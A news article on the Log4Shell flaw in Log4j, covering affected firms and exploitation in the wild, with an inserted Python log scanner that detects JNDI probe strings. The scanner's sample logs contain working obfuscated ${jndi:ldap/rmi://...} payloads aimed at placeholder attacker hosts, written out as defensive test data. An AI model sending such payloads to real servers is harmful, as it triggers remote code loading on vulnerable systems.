The race is on to patch Log4Shell, the bug that’s breaking the internet

There is a critical security flaw, dubbed Log4Shell, in Log4j, an open source logging library that is found in an enormous number of software products. The internet has been put on high alert as attackers ramp up their efforts to target vulnerable systems.

Log4Shell, tracked as CVE-2021-44228, is a zero-day vulnerability that allows attackers to run code remotely on any vulnerable server running Log4j, a Java library that developers use to keep a record of what is happening inside an application as it runs. The flaw is exploitable because Log4j evaluates lookup expressions embedded in the strings it logs: an attacker who can get a string of the form ${jndi:ldap://...} written to a log, for example via a web request header, can make the server fetch and execute code from a host they control.

According to initial reports, the first big-name victim of Log4Shell was Minecraft. Security researchers have since found evidence that Log4Shell was being exploited more than a week before it was publicly disclosed: Talos first observed exploitation attempts on December 2, and Cloudflare's earliest evidence of exploitation dates to December 1.

Matthew Prince, co-founder and CEO of Cloudflare, said that the earliest evidence the company has found so far of the Log4j exploit dates to December 1, which would mean it was in the wild at least nine days before it was publicly disclosed. He added that Cloudflare sees no evidence of mass exploitation until after public disclosure.

Who is affected?

Thousands of companies and services may be affected by the Log4Shell flaw, and the list of confirmed victims keeps growing. Apple, Amazon, Baidu, Google, IBM, Tesla, Twitter and Steam are among the organizations reported to be affected. The flaw also affects many VMware products and some Cisco products.

Many companies have acted quickly. Microsoft, which owns Minecraft, said that it had issued a software update for users of the game, and that it had reviewed its services and concluded that there was no associated risk.

Apple patched iCloud but did not respond to a request for comment. Researchers found the service's web interface to be vulnerable on December 9 and December 10; by December 11 the exploit no longer worked.

The Apache Software Foundation released an emergency security patch for Log4j, and a number of mitigations from the project and from third parties are available for systems that cannot be patched immediately, such as removing the JndiLookup class from the log4j-core jar. Those mitigations are stopgaps; upgrading to a fixed Log4j release remains the real fix.

How bad is the flaw?

As the number of companies and services impacted by Log4Shell grows, so does the number of attacks exploiting the vulnerability. In a post over the weekend, Microsoft said it has observed activity including the installation of coin miners, the deployment of Cobalt Strike to enable credential theft, and the exfiltration of data from compromised systems.

One security firm reported a hundredfold increase in the number of distinct internet addresses it detected probing for Log4Shell on Friday.
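Because the exploit string travels in any field an application might log (a User-Agent header, a URL parameter, a username) and probes routinely disguise the ${jndi: marker with nested lookups, a useful first check for the probing traffic described above is to scan existing logs for it. The following Python detector is an added example, not code from the article or from any of the companies it names: it resolves the common obfuscation idioms (${lower:x}, ${upper:x}, ${key:-default}) the way Log4j's own string substitution would before matching, and runs over constructed sample log lines whose attacker hostnames are placeholders.

```python
"""Scan text logs for Log4Shell (CVE-2021-44228) exploit and probe strings.

Log4j 2.x resolved "${...}" lookups inside the strings it logged, so a
request containing "${jndi:ldap://host/x}" made the server contact that
host and load what it returned. Scanners hide the marker behind nested
lookups such as "${${lower:j}ndi:...}" or "${${::-j}ndi:...}", which Log4j
resolves to "${jndi:...}" before the JNDI lookup runs. This detector
performs the same resolution first, then matches.

Added example, not code from the original article. The sample log lines
and attacker host names below are constructed placeholders.
"""
import re
from typing import Any, Dict, List, Optional

# An innermost "${...}" lookup: its body contains no further '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The de-obfuscated marker: "${jndi:<scheme>://<host>". Log4j lower-cases the
# lookup prefix, so "${JNDI:...}" works too; match case-insensitively.
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+)://([^/:}\s]*)", re.IGNORECASE)


def _resolve_one(match) -> str:
    """Resolve one innermost lookup using the three idioms probes rely on.

    "${lower:X}" -> x, "${upper:x}" -> X, "${anything:-X}" -> X (Log4j's
    default-value syntax for an undefined key). Anything else, including
    the final "${jndi:...}", is returned unchanged so the caller can match it.
    """
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)


def deobfuscate(text: str) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing.

    Every successful resolution removes one "${...}" pair and inserts text
    containing no '$', '{' or '}', so the loop always terminates.
    """
    while True:
        resolved = _INNERMOST.sub(_resolve_one, text)
        if resolved == text:
            return resolved
        text = resolved


def scan_line(line: str) -> Optional[Dict[str, Any]]:
    """Return scheme, host (without port) and the normalised line for the
    first JNDI lookup in a log line, or None if the line carries none."""
    normalized = deobfuscate(line)
    match = _JNDI.search(normalized)
    if match is None:
        return None
    return {"scheme": match.group(1).lower(), "host": match.group(2),
            "normalized": normalized}


def scan_lines(lines: List[str]) -> List[Dict[str, Any]]:
    """Scan a sequence of log lines; each hit also records its 1-based line number."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit is not None:
            hit["line"] = number
            hits.append(hit)
    return hits


# Constructed web-server access-log lines (not a real capture).
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:13:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.attacker.example:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:13:01:06 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://probe.attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.42 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://c2.attacker.example/c}" "-"',
    '198.51.100.7 - - [10/Dec/2021:13:01:12 +0000] "GET /docs?tpl=${env:HOME} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['scheme']}://{hit['host']}  <- {hit['normalized']}")
```

Run against real access, application or proxy logs by feeding lines to scan_lines; the hosts it returns are the callback servers the probes point at, which is what you would block at the egress firewall and look for in outbound DNS and LDAP connection records. The last sample line shows the deliberate limit of the check: it flags only JNDI lookups, not every ${...} expression, so benign template text is left alone.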

Cado Security has also seen an increase in exploitation. The company said that on December 11 it observed Mirai botnet activity exploiting Log4Shell, as well as Muhstik activity from a number of IP ranges. Based on the typical chain of events that follows a widely exploitable flaw, the company believes there is a very strong likelihood that targeted ransomware attacks will follow.

Given how widely Log4j is deployed, this is likely to be the calm before the storm, and patching Log4Shell belongs at the top of every security team's priority list.
